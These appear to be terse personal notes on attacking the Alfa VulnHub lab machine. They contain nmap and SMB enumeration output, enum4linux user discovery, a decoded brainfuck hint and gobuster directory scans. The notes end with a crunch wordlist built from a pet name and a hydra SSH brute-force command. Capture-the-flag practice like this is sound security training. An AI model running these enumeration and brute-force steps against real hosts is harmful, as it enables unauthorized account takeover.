
enum4linux --> Discovery username --> robots.txt file on webserver --> brainfuck --> Hidden directory --> Password structure 
FTP server --> Discovery pet name --> gennerata password list --> brute force ssh connexion --> Discovery password file for vnc connexion.


https://grumpygeekwrites.wordpress.com/2021/04/26/alfa-vulnhub-walk-through-tutorial/

└─$ sudo nmap -sT -A -Pn -n -p- 192.168.110.26  
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-21 10:49 CEST
Nmap scan report for 192.168.110.26
Host is up (0.00017s latency).
Not shown: 65530 closed ports
PORT      STATE SERVICE     VERSION
21/tcp    open  ftp         vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x    2 0        0            4096 Dec 17  2020 thomas
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:192.168.110.1
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
80/tcp    open  http        Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Alfa IT Solutions
139/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp   open  netbios-ssn Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
65111/tcp open  ssh         OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 ad:3e:8d:45:48:b1:63:88:63:47:64:e5:62:28:6d:02 (RSA)
|   256 1d:b3:0c:ca:5f:22:a4:17:d6:61:b5:f7:2c:50:e9:4c (ECDSA)
|_  256 42:15:88:48:17:42:69:9b:b6:e1:4e:3e:81:0b:68:0c (ED25519)
MAC Address: 08:00:27:13:78:E0 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
Network Distance: 1 hop
Service Info: Host: ALFA; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -2d13h03m20s, deviation: 1h09m16s, median: -2d12h23m21s
|_nbstat: NetBIOS name: ALFA, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.9.5-Debian)
|   Computer name: alfa
|   NetBIOS computer name: ALFA\x00
|   Domain name: \x00
|   FQDN: alfa
|_  System time: 2021-06-18T22:26:00+02:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-06-18T20:26:00
|_  start_date: N/A

TRACEROUTE
HOP RTT     ADDRESS
1   0.17 ms 192.168.110.26

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.84 seconds



└─$ curl http://192.168.110.26/robots.txt | grep -v ^$
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   459  100   459    0     0   448k      0 --:--:-- --:--:-- --:--:--  448k
/home
/admin
/login
/images
/cgi-bin
/intranet
/wp-admin
/wp-login
++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>+++++++++++++++++.>>---.+++++++++++.------.-----.<<--.>>++++++++++++++++++.++.-----..-.+++.++.




└─$ smbmap -H 192.168.110.26                                                                                                         127 ⨯
[+] IP: 192.168.110.26:445      Name: 192.168.110.26                                    
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        print$                                                  NO ACCESS       Printer Drivers
        IPC$ 


smbclient -L 192.168.1.40
smbclient //192.168.1.40/guest
get file.txt
nmap --script smb-enum-shares -p139,445 192.168.1.17

└─$ nmap --script smb-enum-shares -p139,445 192.168.110.26 
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-21 11:25 CEST
Nmap scan report for 192.168.110.26
Host is up (0.00023s latency).

PORT    STATE SERVICE
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

Host script results:
| smb-enum-shares: 
|   account_used: guest
|   \\192.168.110.26\IPC$: 
|     Type: STYPE_IPC_HIDDEN
|     Comment: IPC Service (Samba 4.9.5-Debian)
|     Users: 1
|     Max Users: <unlimited>
|     Path: C:\tmp
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\192.168.110.26\print$: 
|     Type: STYPE_DISKTREE
|     Comment: Printer Drivers
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\var\lib\samba\printers
|     Anonymous access: <none>
|_    Current user access: <none>



use auxiliary/scanner/smb/smb_enumshares
set rhosts 192.168.1.17
smbuser raj
smbuser pass 123
exploit



enum4linux 192.168.1.40


343  [+] Enumerating users using SID S-1-22-1 and logon username '', password ''
344  S-1-22-1-1000 Unix User\thomas (Local User)

gobuster dir -u http://192.168.110.26 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt

https://www.dcode.fr/langage-brainfuck
++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>+++++++++++++++++.>>---.+++++++++++.------.-----.<<--.>>++++++++++++++++++.++.-----..-.+++.++.

/alfa-support

I have a problem with my password, I partially forgot it, I only remember that it is the name of my pet followed by 3 numerical digits. Could you reset my password? ✔✔



└─$ crunch  7 7  -t milo%%% -o passwords.txt

└─$ cat users.txt                           
thomas
alfa




hydra -l thomas -P passwords.txt 192.168.110.26 -s 65111 ssh 